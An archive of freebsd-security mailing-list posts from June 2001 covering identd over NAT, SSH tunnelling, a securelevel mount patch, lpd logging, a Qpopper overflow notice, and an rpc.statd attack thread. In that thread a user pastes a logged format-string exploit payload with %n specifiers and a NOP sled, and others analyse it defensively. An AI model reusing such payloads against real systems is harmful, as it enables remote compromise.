From owner-freebsd-security Sun Jun 3 0:31:12 2001 Delivered-To: freebsd-security@freebsd.org Received: from hq.stars.eu.org (pa54.bialystok.sdi.tpnet.pl [213.25.59.54]) by hub.freebsd.org (Postfix) with SMTP id E4F9637B422 for ; Sun, 3 Jun 2001 00:31:07 -0700 (PDT) (envelope-from spock@stars.eu.org) Received: (qmail 38139 invoked by uid 1001); 3 Jun 2001 07:31:03 -0000 Received: from localhost (sendmail-bs@127.0.0.1) by localhost with SMTP; 3 Jun 2001 07:31:03 -0000 Date: Sun, 3 Jun 2001 09:31:03 +0200 (CEST) From: Marcin Jurczuk To: freebsd-security@freebsd.org Subject: Re: Identd via natd In-Reply-To: <3B19D534.78A81EE2@softweyr.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Sun, 3 Jun 2001, Wes Peters wrote: > Marcin Jurczuk wrote: > > > > Hello all ! > > I have a NAT FreeBSD box. > > One of our users use internet connection from out network to hack other > > network server. I cat identify him because log from hacked server shows > > random identds responses from NAT box. > > The question is: Is there any non-random, and non-global ident support for > > natd for FreeBSD like for ipfilter on OpenBSD (oidentd) ? > > /usr/ports/security/oidentd? NO oidentd don't NAT identd support FreeBSD platform :-( There in no ident daemon in ports tree which can do this kind of service. > > > I can't set one ident response because there are some shell accounts and > > they need correct response. > > Define what you mean by "correct response." If you think you mean "giving > away information nobody else really needs to have," think again. Identd is > a stupid solution to a non-problem. Run liedentd and be happy. Correct answer is that user john have identd response "john" like normal ident and user from 192.168.0.10 behind NAT has response i.e "box10" of course if there in not box10 account :-). > No you don't. What you need is: > Stupid Request -> Response that doesn't disclose private data. Perhaps .. Have a nice day.. ================================================ Marcin 'Spock' Jurczuk Intitute of Physics University of Bialystok ================================================ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Jun 3 6:26: 6 2001 Delivered-To: freebsd-security@freebsd.org Received: from mail.atabersk.de (yerowned.atabersk.de [212.34.96.58]) by hub.freebsd.org (Postfix) with ESMTP id D40A237B401 for ; Sun, 3 Jun 2001 06:26:01 -0700 (PDT) (envelope-from patrick-lists@atabersk.de) Received: (qmail 51979 invoked by uid 1000); 3 Jun 2001 13:25:57 -0000 Date: Sun, 3 Jun 2001 15:25:57 +0200 From: Patrick Atamaniuk To: freebsd-security@FreeBSD.ORG Subject: Re: Apache Software Foundation Server compromised, resecured. (fwd) Message-ID: <20010603152556.B51658@mail.atabersk.de> References: Mime-Version: 1.0 Content-Type: multipart/signed; micalg=pgp-sha1; protocol="application/pgp-signature"; boundary="sm4nu43k4a2Rpi4c" Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: ; from brian@collab.net on Fri, Jun 01, 2001 at 08:55:16AM -0700 X-Arbitrary-Number-Of-The-Day: 42 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org --sm4nu43k4a2Rpi4c Content-Type: text/plain; charset=us-ascii Content-Disposition: inline Content-Transfer-Encoding: quoted-printable Brian Behlendorf(brian@collab.net)@2001.06.01 08:55:16 +0000: > On 1 Jun 2001, Dag-Erling Smorgrav wrote: > > You don't need passwords to run CVS against a remote repository. All > > you need is 'CVSROOT=3Duser@server:/path/to/repo' and 'CVS_RSH=3Dssh'. >=20 > For those who use windows and mac GUI CVS clients, pserver's a > requirement. >=20 > IMHO, passwords are neither better nor worse, necessarily, than keys, in > authenticating to a server. The basic difference is between "what you > know" and "what you have". I'm as worried about people who have poor > password management practices, as I am about people whose home or work > machines where their private keys are may not be the most secure. OR having the same private key on more than one machine. The second problem is the practice of 'hopping', which then involves typing pass[wd|phrase] on a trojaned client. Using ssh-agent or not, using an untrusted client for performing challenge-response operations caused the secondary attack to 3rd servers. Host-hopping must become a banished practice. If hopping has to be done, the untrusted client must not perform any authentication to the 3rd server. This probably can be achieved with standa= rd port forwarding. Assume i do have a private key on my local workstation A for host B and C. i establish a tunnel from A to B: A> ssh -L 9999:C:22 B and use it with A> ssh -p 9999 localhost host B is only involed with authorized_keys authorizing the tunnel establis= hment. All authentication between C and A does not involve the client B decrypting= anything. Though B can snoop the communication as it would be on local lan, it cannot= directly intercept keystrokes for passphrase or perform AUTH_SOCK capturing. imvho. --=20 regards, Patrick ---------------------------------------------------- Patrick Atamaniuk patrick@atabersk.de ---------------------------------------------------- --sm4nu43k4a2Rpi4c Content-Type: application/pgp-signature Content-Disposition: inline -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.4 (FreeBSD) Comment: For info see http://www.gnupg.org iD8DBQE7GjrkeMAU+YCwvPYRAjA1AKCjVhi7EX/4arFsQciBlsVcBh0C8wCeIQ57 vo5TK8jbVitfb4TXkCehuIE= =xTSx -----END PGP SIGNATURE----- --sm4nu43k4a2Rpi4c-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Jun 3 6:33:47 2001 Delivered-To: freebsd-security@freebsd.org Received: from mail.atabersk.de (yerowned.atabersk.de [212.34.96.58]) by hub.freebsd.org (Postfix) with ESMTP id 8C32E37B401 for ; Sun, 3 Jun 2001 06:33:42 -0700 (PDT) (envelope-from patrick-lists@atabersk.de) Received: (qmail 52016 invoked by uid 1000); 3 Jun 2001 13:33:48 -0000 Date: Sun, 3 Jun 2001 15:33:48 +0200 From: Patrick Atamaniuk To: freebsd-security@FreeBSD.ORG Subject: Re: remounts (was: Re: adding "noschg" to ssh and friends) Message-ID: <20010603153348.C51658@mail.atabersk.de> References: <20010531123020.6044537B422@hub.freebsd.org> <3B1686B2.5693822B@globalstar.com> Mime-Version: 1.0 Content-Type: multipart/signed; micalg=pgp-sha1; protocol="application/pgp-signature"; boundary="Bn2rw/3z4jIqBvZU" Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <3B1686B2.5693822B@globalstar.com>; from crist.clark@globalstar.com on Thu, May 31, 2001 at 11:00:18AM -0700 X-Arbitrary-Number-Of-The-Day: 42 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org --Bn2rw/3z4jIqBvZU Content-Type: text/plain; charset=us-ascii Content-Disposition: inline almost identical code i am running on a firewall with no problems, only difference to Crists patch (besides no logging) is that unmount suffers from the same problem. beware, the diff is old, may not patch in easily. init(8) states : ... 2 Highly secure mode - same as secure mode, plus disks may not be opened for writing (except by mount(2)) whether mounted or not. This level precludes tampering with filesystems by unmounting them, but also inhibits running newfs(8) while the system is multi-user. ... so i consider unmounting at securelevel 2 not being prohibited not as a bug but i disagree on the statement that this would be higly secure. I dont want to have my firewall filesystems unmounted, being read only or read write, from somewhere else than the local console. IMVHO the securelevel system is not generic enough, a capability system (i.e. kernel variables) defining what is allowed and what is forbidden with a freeze of this definition by raising the securelevel to 1 or higher could help out. (defaulting to current behaviour it most likely would not break anything) to the remarks from Crist (please follow his link below): - controlling the mount in mount(2) in the kernel is the most generic place, there's no way around it. kern.securelevel is imvho not granular enough to end all this selfmade patches and featurerequests. - breaking stuff by raising the securelevel is the whole idea, i agree with Crist. - Brining fine grain and conditions into the game this will be much work. Allowing transitions from insecure to secure (remount ro) would go da'cor with the system immutable flag behaviour, but even that should be controllable (before raising the securelevel actually), since there may be conditions where i need my /usr fs readwrite to operate correctly. (not speaking of /var or others) anyhow, here (my old) patch including unmount. The interested reader may himself include logging of the event. ------ snip ----- --- kern/vfs_syscalls.c.orig Thu Sep 28 23:22:42 2000 +++ kern/vfs_syscalls.c Thu Sep 28 23:28:54 2000 @@ -120,6 +120,9 @@ struct nameidata nd; char fstypename[MFSNAMELEN]; + if (securelevel > 1) + return EPERM; + if (usermount == 0 && (error = suser(p))) return (error); /* @@ -410,6 +413,9 @@ struct mount *mp; int error; struct nameidata nd; + + if (securelevel > 1) + return EPERM; NDINIT(&nd, LOOKUP, FOLLOW | LOCKLEAF, UIO_USERSPACE, SCARG(uap, path), p); ------ snip ----- Crist Clark(crist.clark@globalstar.com)@2001.05.31 11:07:10 +0000: > Crist Clark wrote: > > [snip] > > Oops, the actual patch came shortly after, > > http://docs.freebsd.org/cgi/getmsg.cgi?fetch=31106+0+archive/2001/freebsd-security/20010114.freebsd-security > -- regards, Patrick ---------------------------------------------------- Patrick Atamaniuk patrick@atabersk.de ---------------------------------------------------- //my code breaks everything including your cat. --Bn2rw/3z4jIqBvZU Content-Type: application/pgp-signature Content-Disposition: inline -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.4 (FreeBSD) Comment: For info see http://www.gnupg.org iD8DBQE7Gjy7eMAU+YCwvPYRAmnRAKCub4Fk1M+CZiFAUVaB/jTF1vGX3ACg5Bep 0LRBI5ih/iugMshYsWe7gog= =q9KM -----END PGP SIGNATURE----- --Bn2rw/3z4jIqBvZU-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Jun 3 13: 1: 8 2001 Delivered-To: freebsd-security@freebsd.org Received: from bluenugget.net (babyviolence.com [64.3.150.188]) by hub.freebsd.org (Postfix) with ESMTP id BDF9137B403; Sun, 3 Jun 2001 13:01:02 -0700 (PDT) (envelope-from geniusj@bsd.st) Received: from bsd.st (windows.box [64.3.150.191]) by bluenugget.net (Postfix) with ESMTP id 4091613618; Sun, 3 Jun 2001 12:36:35 -0700 (PDT) Message-ID: <3B1A92C6.8030301@bsd.st> Date: Sun, 03 Jun 2001 12:40:54 -0700 From: Jason DiCioccio User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:0.9) Gecko/20010505 X-Accept-Language: en MIME-Version: 1.0 To: Darren Reed Cc: current@FreeBSD.org, security@FreeBSD.org, current-users@netbsd.org Subject: Re: IPFilter licence update References: <200106031349.XAA01100@avalon.reed.wattle.id.au> Content-Type: text/plain; charset=us-ascii; format=flowed Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Darren Reed wrote: > >The licence is intended to mean that people can use (which includes modify >or patch or tune, as seen fit) IPFilter as found within FreeBSD/NetBSD for >whatever purpose they desire - so long as the conditions (due credit and the >notice) are met. > So, out of curiosity, does this mean that only the slightly modified derivatives of IPFilter found in FreeBSD and NetBSD may be modified? Or am I reading this wrong? If not, are you just changing the interpretation of the license? Or are you effectively granting permission for modification as stated in your license? Thanks in advance, -JD- -- Jason DiCioccio - geniusj@bsd.st - PGP Key @ http://bsd.st/~geniusj/pgpkey.asc To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Jun 3 15:42:12 2001 Delivered-To: freebsd-security@freebsd.org Received: from neko.cts.com (neko.cts.com [209.68.192.150]) by hub.freebsd.org (Postfix) with ESMTP id D42AA37B403; Sun, 3 Jun 2001 15:42:04 -0700 (PDT) (envelope-from mdavis@cts.com) Received: from venus.cts.com (venus.cts.com [216.120.25.34]) by neko.cts.com (8.9.3/8.9.3) with ESMTP id PAA15312; Sun, 3 Jun 2001 15:41:54 -0700 (PDT) Received: from orion (orion.cts.com [216.120.25.39]) by venus.cts.com (8.11.3/8.11.3) with ESMTP id f53MfnF03846; Sun, 3 Jun 2001 15:41:49 -0700 (PDT) (envelope-from mdavis@cts.com) From: "Morgan Davis" To: "'Garance A Drosihn'" Cc: "'Hajimu UMEMOTO'" , , , Subject: RE: Malformed from address Date: Sun, 3 Jun 2001 15:42:15 -0700 Message-ID: <003f01c0ec7e$738b3030$271978d8@cts.com> MIME-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Content-Transfer-Encoding: 7bit X-Priority: 3 (Normal) X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook, Build 10.0.2511 In-Reply-To: Importance: Normal X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2475.0000 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Garance wrote: > I also agree that administrators should > not have to patch and recompile lpd to get the behavior they want. Having it "work" like it used to is more of an expectation rather than a want. > >(My vote is for a runtime flag that disables port > > checking or allows you to specify your own acceptable range.) > > As a security matter, I think it should do the port checking by > default, and the option would be to turn that checking off. Agreed -- that was my suggestion. Do it by the book by default, but give us the ability to break it so we can work with broken clients. > a better (but more involved) fix would be to have two lists of > allowed hosts. That's an excellent idea. The system could then accommodate the sinners and the saints in relative security. > >truly log fatal() error messages, rather than spewing them > >uselessly into stdout (or the socket stream). > > Hmm. Not sure what you mean here. At least at RPI, we DO > get error messages in logfiles, at least for some kinds of > errors. What do you have for 'lpr'-ish entries in your > /etc/syslog.conf ? >.. > I know that we have SOME logfile entries when hosts are not in > hosts.lpd, for instance. If you look at all the calls to fatal() you'll see helpful troubleshooting information that doesn't make it into the logs. The only thing you'll get in either /var/log/messages or /var/log/lpd-errs are items such as: Jun 1 01:27:32 venus lpd[623]: lpd startup: logging=1 dbg Jun 1 01:27:32 venus lpd[623]: lpd startup: ready to accept requests Jun 2 03:17:37 venus lpd[1960]: lpd startup: logging=1 dbg Jun 2 03:17:38 venus lpd[1960]: lpd startup: ready to accept requests Jun 2 03:23:31 venus lpd[1960]: exiting on signal 15 Jun 2 03:24:24 venus lpd[2174]: lpd startup: logging=1 dbg Jun 2 03:24:24 venus lpd[2174]: lpd startup: ready to accept requests Jun 2 03:25:18 venus lpd[2174]: exiting on signal 15 (I'm running with the stock syslog.conf). During this 24+ hour period, I was generating "malformed from address" errors. That's why I ultimately had to resort to tcpdump to see what was going on. You can easily test it on your own system by using telnet to upset lpd and issue the "Malformed from address". You'll see it on your telnet session terminal, but if you look in lpd-errs or messages log, it's not in there, even with -l and -d enabled. What other fatal() messages are sent back to the client and are never known to the administrator? > Maybe we turn up logging, or maybe it's > just some other difference between RPI's lpd and freebsd's. You've made several references to RPI and FreeBSD versions of lpd, as if they're different. Are you not the code maintainer for FreeBSD's lpd? If not, who is "gad"? --Morgan To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Jun 3 23:30:48 2001 Delivered-To: freebsd-security@freebsd.org Received: from mailhub.cns.ksu.edu (grunt.ksu.ksu.edu [129.130.12.17]) by hub.freebsd.org (Postfix) with ESMTP id 8DDEC37B401 for ; Sun, 3 Jun 2001 23:30:43 -0700 (PDT) (envelope-from jdt2101@ksu.edu) Received: from unix1 (jdt2101@unix1.cc.ksu.edu [129.130.12.3]) by mailhub.cns.ksu.edu (8.9.1/8.9.1/mailhub+tar) with SMTP id BAA28276 for ; Mon, 4 Jun 2001 01:30:42 -0500 (CDT) Received: from localhost by unix1 (SMI-8.6/1.34) id BAA03292; Mon, 4 Jun 2001 01:30:42 -0500 Date: Mon, 4 Jun 2001 01:30:42 -0500 (CDT) From: Josh Thomas X-Sender: jdt2101@unix1.cc.ksu.edu To: freebsd-security@freebsd.org Subject: rpc.statd attack before ipfw activated In-Reply-To: <3B1A92C6.8030301@bsd.st> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org I didn't set up ipfw for a couple of days in between setting up a small nfs server for an in-home lan, and I got this in my system log. I realize that I should have set up ipfw before doing this now, but any ideas what just happened? Here is the log: Jun 2 19:36:41 thatguys rpc.statd: invalid hostname to sm_stat: ^X\xf7\xff\xbf^ X\xf7\xff\xbf^Y\xf7\xff\xbf^Y\xf7\xff\xbf^Z\xf7\xff\xbf^Z\xf7\xff\xbf^[\xf7\xff\ xbf^[\xf7\xff\xbf%8x%8x%8x%8x%8x%8x%8x%8x%8x%236x%n%137x%n%10x%n%192x%nM-^PM-^PM -^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM -^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM -^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM -^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM -^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM -^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM -^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM -^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM -^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM -^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM -^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^P Jun 2 19:36:41 thatguys /kernel: PM-^PM-^PM-^P And it cut off there. This is a home machine, and yes, I realize that a firewall should have been running first, however, I didn't have time. I'm a relative novice to rpc and nfs in general, so any clues would be appreciated. Thanks, Josh Thomas Student Systems Analyst Engineering Computing Center Kansas State University To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jun 4 0: 7:24 2001 Delivered-To: freebsd-security@freebsd.org Received: from ringworld.nanolink.com (ringworld.nanolink.com [195.24.48.13]) by hub.freebsd.org (Postfix) with SMTP id 97D5C37B403 for ; Mon, 4 Jun 2001 00:07:21 -0700 (PDT) (envelope-from roam@orbitel.bg) Received: (qmail 90736 invoked by uid 1000); 4 Jun 2001 07:06:15 -0000 Date: Mon, 4 Jun 2001 10:06:15 +0300 From: Peter Pentchev To: Josh Thomas Cc: freebsd-security@freebsd.org Subject: Re: rpc.statd attack before ipfw activated Message-ID: <20010604100615.B31878@ringworld.oblivion.bg> Mail-Followup-To: Josh Thomas , freebsd-security@freebsd.org References: <3B1A92C6.8030301@bsd.st> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: ; from jdt2101@ksu.edu on Mon, Jun 04, 2001 at 01:30:42AM -0500 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Mon, Jun 04, 2001 at 01:30:42AM -0500, Josh Thomas wrote: > I didn't set up ipfw for a couple of days in between setting up a small > nfs server for an in-home lan, and I got this in my system log. I realize > that I should have set up ipfw before doing this now, but any ideas what > just happened? Here is the log: > Jun 2 19:36:41 thatguys rpc.statd: invalid hostname to > sm_stat: ^X\xf7\xff\xbf^ [snip] > > And it cut off there. This is a home machine, and yes, I realize that a > firewall should have been running first, however, I didn't have time. I'm > a relative novice to rpc and nfs in general, so any clues would be > appreciated. Thanks, There is no known vulnerability in recent FreeBSD rpc.statd(8). However, there *have* been known vulnerabilities in rpc.statd's of several other OS's in relatively recent versions. What you are seeing is someone trying to exploit such a vulnerability, and failing, causing no harm whatsoever to your system. G'luck, Peter -- This sentence would be seven words long if it were six words shorter. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jun 4 4: 6:36 2001 Delivered-To: freebsd-security@freebsd.org Received: from moutvdom01.kundenserver.de (moutvdom01.kundenserver.de [195.20.224.200]) by hub.freebsd.org (Postfix) with ESMTP id C346D37B401 for ; Mon, 4 Jun 2001 04:06:32 -0700 (PDT) (envelope-from ingram@vc-protect.net) Received: from [195.20.224.204] (helo=mrvdom00.schlund.de) by moutvdom01.kundenserver.de with esmtp (Exim 2.12 #2) id 156sBs-0003Q4-00 for freebsd-security@freebsd.org; Mon, 4 Jun 2001 13:06:32 +0200 Received: from pd4b8927f.dip.t-dialin.net ([212.184.146.127] helo=server) by mrvdom00.schlund.de with smtp (Exim 2.12 #2) id 156sBF-0003my-00 for freebsd-security@freebsd.org; Mon, 4 Jun 2001 13:05:53 +0200 From: Gino Thomas X-Mailer: Arrow 1.0.8 (X11; FreeBSD 4.3-RELEASE; i386) To: freebsd-security@freebsd.org Subject: Re: rpc.statd attack before ipfw activated Message-Id: Date: Mon, 4 Jun 2001 13:05:53 +0200 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Mon, 4 Jun 2001 01:30:42 -0500 (CDT), Josh Thomas wrote: >^X\xf7\xff\xbf^ > X\xf7\xff\xbf^Y\xf7\xff\xbf^Y\xf7\xff\xbf^Z\xf7\xff\xbf^Z\xf7\xff\xbf^[\xf7\xff\ > xbf^[\xf7\xff\xbf%8x%8x%8x%8x%8x%8x%8x%8x%8x%236x%n%137x%n%10x%n%192x%n Seems to be a typical shellcode string. > ^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM -- cut -- I have seen this before, aren´t that "NOPS" (x90)? Or are that return adresses? A "typical" attackbuffer looks like this: nopnopnopnopshellcode/bin/shretretretretret it seems you you´ve been hit by an exploit which tries to get a remote shell. Do you have dumps of the arbitary packets? > And it cut off there. This is a home machine, and yes, I realize that a > firewall should have been running first, however, I didn't have time. I'm > a relative novice to rpc and nfs in general, so any clues would be > appreciated. Thanks, Take a look at snort, in my case it protects from many attacks like this (cause not many attackers are skilled enough to hack up the shellcode etc. to fool the ids). Also try to minimize services that run as root ore execute suid programms. my regards Gino Thomas System Security Assistant To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jun 4 4:25:19 2001 Delivered-To: freebsd-security@freebsd.org Received: from internethelp.ru (wh.internethelp.ru [212.113.112.145]) by hub.freebsd.org (Postfix) with ESMTP id C3D4D37B403 for ; Mon, 4 Jun 2001 04:25:13 -0700 (PDT) (envelope-from nkritsky@internethelp.ru) Received: from ibmka (ibmka.internethelp.ru. [192.168.0.6]) by internethelp.ru (8.9.3/8.9.3) with SMTP id PAA01815 for ; Mon, 4 Jun 2001 15:25:11 +0400 (MSD) Message-ID: <056701c0ece9$0308d720$0600a8c0@ibmka.internethelp.ru> From: "Nickolay A. Kritsky" To: Subject: Re: FYI Date: Mon, 4 Jun 2001 15:25:03 +0400 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 8bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 4.72.3110.5 X-MimeOLE: Produced By Microsoft MimeOLE V4.72.3110.3 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Does it mean, that popper supplied with FreeBSD 3.3 (/usr/local/libexec/popper) is vulnerable too? Best Regards NKritsky - SysAdmin InternetHelp.Ru http://www.internethelp.ru e-mail: nkritsky@internethelp.ru -----Original Message----- From: Brett Glass To: security@FreeBSD.ORG Date: 2 èþíÿ 2001 ã. 22:49 Subject: FYI >Date: Fri, 1 Jun 2001 23:28:20 -0700 >From: Qpopper Support >To: Qpopper Public List , > qpopper-announce@rohan.qualcomm.com >Cc: qpopper@qualcomm.com >Subject: Qpopper 4.0.3 **** Fixes Buffer Overflow **** > >Qpopper 4.0.3 is available at >. > > >**** 4.0.3 FIXES A BUFFER OVERFLOW PRESENT IN ALL VERSIONS OF 4.0 -- >PLEASE UPGRADE IMMEDIATELY *** > > >Changes from 4.0.2 to 4.0.3: >---------------------------- > 1. Don't call SSL_shutdown unless we tried to negotiate an > SSL session. (As suggested by Kenneth Porter.) > 2. Fix buffer overflow (reported by Gustavo Viscaino). > 3. Fixed empty password treated as empty command (patch > submitted by Michael Smith and others). > 4. Added patch by Carles Xavier Munyoz to fix erroneous > scanning for \n in getline(). > 5. Fix from Arvin Schnell for warnings on 64-bit systems. > 6. Added patch by Clifton Royston to change error message > for nonauthfile and authfile tests. > 7. Added 'uw-kludge' as synonym for 'uw-kluge'. > > >To Unsubscribe: send mail to majordomo@FreeBSD.org >with "unsubscribe freebsd-security" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jun 4 5:21:30 2001 Delivered-To: freebsd-security@freebsd.org Received: from yeti.ismedia.pl (yeti.ismedia.pl [212.182.96.18]) by hub.freebsd.org (Postfix) with SMTP id E67DB37B401 for ; Mon, 4 Jun 2001 05:21:21 -0700 (PDT) (envelope-from venglin@freebsd.lublin.pl) Received: (qmail 16472 invoked from network); 4 Jun 2001 12:21:17 -0000 Received: from unknown (212.182.115.11) by 0 with QMTP; 4 Jun 2001 12:21:17 -0000 Received: (qmail 38424 invoked from network); 4 Jun 2001 12:21:16 -0000 Received: from unknown (unknown) by unknown with QMQP; 4 Jun 2001 12:21:16 -0000 Date: Mon, 4 Jun 2001 14:21:16 +0200 From: Przemyslaw Frasunek To: Gino Thomas Cc: security@freebsd.org Subject: Re: rpc.statd attack before ipfw activated Message-ID: <20010604142116.R3509@riget.scene.pl> References: Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: ; from ingram@vc-protect.net on Mon, Jun 04, 2001 at 01:05:53PM +0200 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Mon, Jun 04, 2001 at 01:05:53PM +0200, Gino Thomas wrote: > > xbf^[\xf7\xff\xbf%8x%8x%8x%8x%8x%8x%8x%8x%8x%236x%n%137x%n%10x%n%192x%n > Seems to be a typical shellcode string. It isn't 'typical' shellcode string. Bug in Linux rpc.statd is format string vulnerability, not buffer overflow. > A "typical" attackbuffer looks like this: nopnopnopnopshellcode/bin/shretretretretret Not in case of formatting vulnerabilities. -- * Fido: 2:480/124 ** WWW: http://www.frasunek.com/ ** NIC-HDL: PMF9-RIPE * * Inet: przemyslaw@frasunek.com ** PGP: D48684904685DF43EA93AFA13BE170BF * To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jun 4 8:14:25 2001 Delivered-To: freebsd-security@freebsd.org Received: from ct980320-b.blmngtn1.in.home.com (ct980320-b.blmngtn1.in.home.com [65.8.207.32]) by hub.freebsd.org (Postfix) with ESMTP id 4557C37B405 for ; Mon, 4 Jun 2001 08:14:22 -0700 (PDT) (envelope-from mikes@ct980320-b.blmngtn1.in.home.com) Received: (from mikes@localhost) by ct980320-b.blmngtn1.in.home.com (8.11.3/8.11.3) id f54FEKL18615; Mon, 4 Jun 2001 10:14:20 -0500 (EST) (envelope-from mikes) From: Mike Squires Message-Id: <200106041514.f54FEKL18615@ct980320-b.blmngtn1.in.home.com> Subject: Re: rpc.statd attack before ipfw activated In-Reply-To: "from Josh Thomas at Jun 4, 2001 01:30:42 am" To: Josh Thomas Date: Mon, 4 Jun 2001 10:14:20 -0500 (EST) Cc: freebsd-security@freebsd.org X-Mailer: ELM [version 2.4ME+ PL88 (25)] MIME-Version: 1.0 Content-Transfer-Encoding: 7bit Content-Type: text/plain; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org I think this is the LINUX Ramen/Lion/Adore worm in action. The NOPs are always preceded by a check for rpc.statd services. snort will detect these. I use snortsnarf with snort; snortsnarf gives you Web lookups for the attacks. 4.3-STABLE isn't vulnerable, as far as I know. MLS To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jun 4 12:42:23 2001 Delivered-To: freebsd-security@freebsd.org Received: from web11807.mail.yahoo.com (web11807.mail.yahoo.com [216.136.172.161]) by hub.freebsd.org (Postfix) with SMTP id 3EF3D37B403 for ; Mon, 4 Jun 2001 12:42:20 -0700 (PDT) (envelope-from arnims@yahoo.com) Message-ID: <20010604194220.93548.qmail@web11807.mail.yahoo.com> Received: from [62.54.67.118] by web11807.mail.yahoo.com; Mon, 04 Jun 2001 12:42:20 PDT Date: Mon, 4 Jun 2001 12:42:20 